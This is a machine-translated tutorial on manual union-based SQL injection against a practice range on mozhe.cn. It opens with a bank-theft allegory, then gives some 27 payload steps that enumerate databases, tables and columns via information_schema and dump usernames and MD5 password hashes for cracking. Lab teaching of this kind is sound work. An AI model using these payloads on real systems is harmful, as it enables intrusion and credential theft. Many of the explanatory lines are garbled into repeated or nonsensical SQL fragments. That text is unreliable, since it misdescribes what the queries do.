Introduction to SQL Injection
SQL injection, in fact, is the variable content submitted by the user browser, application procedures (code may be ASP, ASPX, PHP, JSP, etc.) submitted by the browser over the data is not filtered, directly to the database query, resulting in the database of other content (such as management account and password) query back to the page. First, take a look at a short story from the Story Of the Mohist College:
In one town, the bank safe serves as a common area for residents to store valuables. In order to prevent them from taking other people’s belongings by mistake, the bank has a rule that each person can only take one key to open his or her own safe at a time. There is a security guard at the security gate of the bank. The security guard is responsible for checking that people who enter the safe are carrying only one key at a time.
There are many banks in this town, there is A man named “passer-by A”, he went to A bank to take goods, A bank security inspector dutifully, on the “passer-by A” body up and down, inside and out meticulously check N times, to ensure that he only took A key of his own, before allowing him to go in to take goods; Later, “passer-by A” went to B bank to get goods, he found that B bank security inspector is the president’s brother-in-law, the post is just a decoration, never work in the future, enter the safe no one to check. So “man” with his and his wife together with the key to get found successfully to items, “man” is more with screwdriver, through my torso, use a screwdriver to open the President’s brother-in-law cabinet, successfully take away his goods, “a passer-by” found that governor of cabinet is welded with steel plates, the screwdriver can’t open it, he would bring the cutting machine, Through the security gate, spent a lot of effort with the cutting machine to open the cabinet, the president of the cabinet all the things taken away.
Discovering that he could “get rich”, the man loitered from bank to bank all day, looking for lax security checks to pick up other people’s belongings. The security cameras of every bank recorded his comings and goings. Finally, one day, a bank told the police, who retrieved the video content of the camera and arrested the “passer-by A”. According to relevant laws and regulations, “passer-by A” suspected of unauthorized acquisition (invasion) of other people’s goods, was sentenced to prison.
Let’s assign each part of the story a role:
Town == Internet
◆ Banking == Business System (website)
◆ Security gate == application (code)
Safety inspector == filter unsafe code (such as SQL injection, XSS and other dangerous code)
◆ Items in the safe == data stored in the database, may contain account passwords and other sensitive data
◆ Brother-in-law’s safe items == business system (website) management rights
◆ Line safe items == server (host) permissions
◆ “passerby” == the person who operates the browser
◆ “passer-by A” key == submit normal variable content
◆ “passer-by A” wife key == submit test SQL injection statement
◆ Screwdriver == submit SQL to inject other statements
◆ Cutting machine ==WebShell or power command
◆ Camera == all kinds of logging
◆ Police == real police uncle
Laws and regulations == Criminal Law, Cyber Security Law
If passer-by a is a security company, and he comes to secure the bank, he should know best where the bank is most vulnerable. Can do a safety protection, to the bank to collect items in town is more, do more a few doors (load balancing), to the bank’s security door add several layers of security (firewalls, WAF, IPS, IDS and other security equipment), the President’s brother-in-law and change (repair), and a day to check whether the security personnel on the job work (regular), There are other ways to protect security besides putting the safe and security in separate rooms (the database is separate from the application) and turning on all cameras (logging is enabled). Here is not to tell the story, the real reality of the business system reinforcement, is to be decided according to the business scenario.
Online range address
This is the simplest and basic part of SQL injection practice. It requires users to understand the most basic syntax and database structure of MySQL. Please add your own MySQL basics.
MySQL Manual injection firing range (environment described in this article) : www.mozhe.cn/bug/detail/…
Manual SQL Injection firing range: www.mozhe.cn/Special/SQL…
Manual SQL injection details
Manual SQL injection process, the database executed the statement, is the page submitted to the server application program, the application program to obtain the id value, and then the value of the Mosaic into the query statement, query in the database, through the program parsing, the results back on the page, (please replace mozhe.cn with the corresponding address of the shooting range).
Start range environment:
Step 1
Select * from news where id=1
Page Return Description: The displayed information is normal
Analysis explanation: Browse the page normally and find the place with parameters, such as ID.
Step 2:
Select * from news where id=1 and 1=1
Page Return Description: The displayed information is normal
Analysis: Test SQL statements.
Step 3:
Select * from news where id=1 and 1=2
Page return description: The returned content is empty
1=2;
Step 4:
Select * from news where id=1 order by 1
Page Return Description: The displayed information is normal
Select * from the SQL statement where the order by N column is displayed.
Step 5:
Select * from news where id=1 order by 2
Page Return Description: The displayed information is normal
Select * from the SQL statement where order by N indicates that there are at least two columns.
Step 6:
Select * from news where id=1 order by 3
Page Return Description: The displayed information is normal
Select * from ‘order by N’; select * from ‘order by N’;
Step 7:
Select * from news where id=1 order by 4
Page Return Description: The displayed information is normal
SQL > select * from ‘order by N’; select * from ‘order by N’;
Step 8:
Select * from news where id=1 order by 5
Page return description: The returned content is empty
The number of fields in the SQL statement order by N is less than five.
Step 9:
Select * from news where id=1 and 1=2 union select 1,2,3,4
The page returns the description: position 2 on the original title, position 3 on the content
And 1=2 union select 1,2,3… Select id,title,contents,times from news where id=1 select id,title,contents,times from news where id=1 Contents is displayed in the third place. For an introduction to the grammar of union, please do your homework.
Step 10:
Select * from news where ID =1 and 1=2 union select 1,database(),version(),4
The page returns the description: the location on the original title was mozhe_Discuz_StormGroup, and the location of the content was 5.7.22-0ubuntu0.16.04.1
SQL > select database(); , there may be more than one database on a server, version() is to query the current data version(syntax: select version();) Mozhe_Discuz_StormGroup is the database. 5.7.22-0Ubuntu0.16.04.1 is the database version and the operating system version.
Step 11:
Select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 0,1
The page returns the description: the location is information_SCHEMA on the original title, and the location of the content is 3
Analysis and interpretation: Database information_SCHEMA, table SCHEMATA, and column SCHEMA_NAME are involved here. The database information_schema is the database of MySQL system, which records most of the information we need to solve the current database system. Such as character sets, permission dependencies, database entity object information, external check constraints, partitioning, compressed tables, table information, index information, parameters, optimizations, locks, and transactions. The information_schema contains the database name, table name, column name, and other information for the MySQL database. Information_schema is the name of the first database to be retrieved from the database limit 0,1.
Step 12:
Select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 1,1
The page returns the description: the location on the original title is mozhe_Discuz_StormGroup, and the location of the content is 3
Limit 1,1 means that from row 1, take row 1, mozhe_Discuz_StormGroup as the second database name.
Step 13:
Select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 2,1
The page returns the description: the location is mysql on the original title, and the location of the content is 3
Mysql > select * from mysql.mysql; select * from mysql.mysql; select * from mysql.mysql;
Step 14:
Select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 3,1
The page returns the description: the location is performance_SCHEMA on the original title and the location of the content is 3
Performance_schema = performance_schema = performance_schema = performance_schema = performance_schema = performance_schema
Step 15:
Select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 4,1
The page returns the description: the position is displayed as SYS on the original title and the position of the content is displayed as 3
Limit 4,1: select row 1 from row 4 and select sys as the fifth database name.
Step 16:
http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 5,1
Select * from news where id=1 and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.schemata limit 5,1
Page return description: The returned content is empty
There are only five databases (information_SCHEMA, mozhe_Discuz_StormGroup, mysql, Performance_schema, sys).
Step 17:
Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.tables where TABLE_SCHEMA = ‘mozhe_Discuz_StormGroup limit 0, 1
Database execution statement: Select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.tables where TABLE_SCHEMA = ‘mozhe_Discuz_StormGroup limit 0, 1
The page returns the description: the location is displayed as StormGroup_member on the original title, and the content is displayed as 3
SQL > select * from mozhe_Discuz_StormGroup where limit 0,1, StormGroup_member;
18 step:
Page submission: http://mozhe.cn/new_list.php?id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.tables where TABLE_SCHEMA = ‘mozhe_Discuz_StormGroup limit 1, 1
Database execution statement: Select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.tables where TABLE_SCHEMA = ‘mozhe_Discuz_StormGroup limit 1, 1
The page returns the description: notice is displayed in the original title position, and the content position is displayed as 3
Select * from mozhe_Discuz_StormGroup; select * from mozhe_Discuz_StormGroup; select * from mozhe_Discuz_StormGroup; select * from mozhe_Discuz_StormGroup; select * from mozhe_Discuz_StormGroup;
Step 19:
Database execution statement: Select * from news where id=1 and 1=2 union select 1,TABLE_NAME,3,4 from information_schema.tables where TABLE_SCHEMA = ‘mozhe_Discuz_StormGroup limit 2, 1
Page return description: The returned content is empty
Mozhe_Discuz_StormGroup has only two tables, StormGroup_member and notice.
Step 20:
Database execution statement: select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA=’mozhe_Discuz_StormGroup’ and TABLE_NAME=’StormGroup_member’ limit 0,1
The page returns the description: the position is id on the original title, and the position of the content is int(11).
Select * from StormGroup_member where id = id and type = int(11); select * from StormGroup_member where id = id and type = int(11);
Step 21:
Database execution statement: select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA=’mozhe_Discuz_StormGroup’ and TABLE_NAME=’StormGroup_member’ limit 1,1
Page return description: The position on the original title is displayed as name, and the position of the content is displayed as varchar(20).
Select * from StormGroup_member where name = varchar(20); select * from StormGroup_member where name = varchar(20);
Step 22:
Database execution statement: select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA=’mozhe_Discuz_StormGroup’ and TABLE_NAME=’StormGroup_member’ limit 2,1
The page returns the description: in the original title position is displayed as password, content position is displayed as varchar(255)
Select * from mozhe_Discuz_StormGroup; select * from mozhe_Discuz_StormGroup; select * from mozhe_Discuz_StormGroup;
Step 23:
Database execution statement: select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA=’mozhe_Discuz_StormGroup’ and TABLE_NAME=’StormGroup_member’ limit 3,1
The page returns the description: the position is status on the original title, and the position of the content is int(11).
Select * from mozhe_Discuz_StormGroup; select * from StormGroup_member; select * from mozhe_Discuz_StormGroup; select * from StormGroup_member; select * from StormGroup_member;
Step 24:
Database execution statement: select * from news where id=1 and 1=2 union select 1,COLUMN_NAME,COLUMN_TYPE,4 from information_schema.COLUMNS where TABLE_SCHEMA=’mozhe_Discuz_StormGroup’ and TABLE_NAME=’StormGroup_member’ limit 4,1
Page return description: The returned content is empty
StormGroup_member in mozhe_Discuz_StormGroup has only 4 columns, and the names are ID, name, password, and status.
Step 25:
Select * from news where id=1 and 1=2 union select 1,count(*),3,4 from mozhe_discuz_stormgroup.stormgroup_member
The page returns the description: position 2 on the original title, position 3 on the content
SQL > select StormGroup_member from mozhe_Discuz_StormGroup;
Step 26:
Database execution statement: Select * from news where id=1 and 1=2 union select 1,CONCAT(name,’-‘,password,’-‘,status),3,4 from news where id=1 and 1=2 union select 1,CONCAT(name,’-‘,password,’-‘,status),3,4 from Mozhe_Discuz_StormGroup. StormGroup_member limit 0, 1
Page back description: on the title of the original location for f589a7df439f6f744ff19bb8092c0 mozhe – 356-0, the location of the content is shown as 3
Analysis and interpretation: Select * from mozhe_Discuz_StormGroup; select * from mozhe_Discuz_StormGroup; select * from StormGroup_member; The place was spliced together to show it all in one place. Can get the name of the account to mozhe first data, password password is 356 f589a7df439f6f744ff19bb8092c0 (md5 encrypted password, can decrypt the plaintext), status account status to 0.
27 step:
Database execution statement: Select * from news where id=1 and 1=2 union select 1,CONCAT(name,’-‘,password,’-‘,status),3,4 from news where id=1 and 1=2 union select 1,CONCAT(name,’-‘,password,’-‘,status),3,4 from Mozhe_Discuz_StormGroup. StormGroup_member limit 1, 1
Page back description: on the title of the original location for ffa6520047acfe95d29ae707b mozhe – 6380305-1, the location of the content is shown as 3
Analysis and interpretation: Select * from mozhe_Discuz_StormGroup; select * from mozhe_Discuz_StormGroup; select * from StormGroup_member; The place was spliced together to show it all in one place. Can get the name of the account to mozhe first data, password password is 6380305 ffa6520047acfe95d29ae707b (md5 encrypted password, can decrypt the plaintext), status account status to 1.
Decrypt the final MD5 password, you can get the background login password in plain text.
In this process, all SQL injection statements do not do any escape and comment, in the actual process, may encounter the injection point processing, closed quotes, parentheses and so on must be closed first, string hexadecimal, comment out redundant statements and so on.